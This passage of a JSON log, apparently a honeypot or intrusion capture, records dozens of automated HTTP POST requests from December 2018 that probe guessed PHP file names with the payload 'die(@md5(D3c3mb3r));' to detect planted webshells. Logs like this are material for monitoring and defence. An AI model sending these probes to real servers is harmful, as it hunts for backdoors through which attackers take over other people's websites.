- "data": "POST /666.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nhacker=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:56.000Z",
- "data": "POST /777.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n-77=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:56.000Z",
- "data": "POST /qwq.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:55.000Z",
- "data": "POST /HX.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nhacker=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:55.000Z",
- "data": "POST /diy.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 29\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ndiyworld=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:54.000Z",
- "data": "POST /conf.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:54.000Z",
- "data": "POST /123.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nhacker=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:54.000Z",
- "data": "POST /m.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:53.000Z",
- "data": "POST /a.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:52.000Z",
- "data": "POST /1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:52.000Z",
- "data": "POST /p.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nc=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:52.000Z",
- "data": "POST /2.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n123=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:51.000Z",
- "data": "POST /xp.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nx=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:51.000Z",
- "data": "POST /1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:50.000Z",
- "data": "POST /hello.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:50.000Z",
- "data": "POST /hell.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:50.000Z",
- "data": "POST /admn.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:49.000Z",
- "data": "POST /hello.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n123=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:48.000Z",
- "data": "POST /s1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n258=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:48.000Z",
- "data": "POST /xiaodai.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiaodai=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:48.000Z",
- "data": "POST /api.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiaoer=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:47.000Z",
- "data": "POST /ldw.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncc123=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:47.000Z",
- "data": "POST /repeat.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ntomkey=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:46.000Z",
- "data": "POST /fusheng.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nfusheng=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:46.000Z",
- "data": "POST /general.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nf11=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:46.000Z",
- "data": "POST /5201314.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n5201314=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:45.000Z",
- "data": "POST /51314.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nwen=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:44.000Z",
- "data": "POST /erwa.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nerwa=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:44.000Z",
- "data": "POST /ruyi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n905=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:44.000Z",
- "data": "POST /pma.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nmmp=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:43.000Z",
- "data": "POST /godkey.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ngodkey=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:43.000Z",
- "data": "POST /okokok.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ngodkey=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:42.000Z",
- "data": "POST /nuoxi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nnuoxi=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:42.000Z",
- "data": "POST /dexgp.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n123=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:42.000Z",
- "data": "POST /x.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n123=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:41.000Z",
- "data": "POST /z.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n123=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:40.000Z",
- "data": "POST /xxx.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:40.000Z",
- "data": "POST /92.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n92=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:40.000Z",
- "data": "POST /Ss.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nnone=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:39.000Z",
- "data": "POST /hack.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:39.000Z",
- "data": "POST /qa.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nq=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:38.000Z",
- "data": "POST /ver.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:38.000Z",
- "data": "POST /confg.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n5=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:38.000Z",
- "data": "POST /confg.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n4=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:37.000Z",
- "data": "POST /confg.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n4=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:36.000Z",
- "data": "POST /1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:36.000Z",
- "data": "POST /conf1g.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n5=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:36.000Z",
- "data": "POST /confg.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n5=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:35.000Z",
- "data": "POST /sha.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nsha=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:35.000Z",
- "data": "POST /ppx.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nppx=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:34.000Z",
- "data": "POST /qaz.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ndaoen=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:34.000Z",
- "data": "POST /core.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1989=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:34.000Z",
- "data": "POST /2.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1989=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:33.000Z",
- "data": "POST /1.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1989=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:32.000Z",
- "data": "POST /sss.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nsdf=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:32.000Z",
- "data": "POST /u.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nsdf=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:32.000Z",
- "data": "POST /uuu.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nsdf=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:31.000Z",
- "data": "POST /wcp.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:31.000Z",
- "data": "POST /ss.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:30.000Z",
- "data": "POST /qw.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nqw=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:30.000Z",
- "data": "POST /test.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\npass=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:30.000Z",
- "data": "POST /caonma.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncaonma=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:29.000Z",
- "data": "POST /s.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\na=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:28.000Z",
- "data": "POST /she.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\npass=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:28.000Z",
- "data": "POST /zuoshss.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:28.000Z",
- "data": "POST /boots.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiao=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:27.000Z",
- "data": "POST /zuos.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:27.000Z",
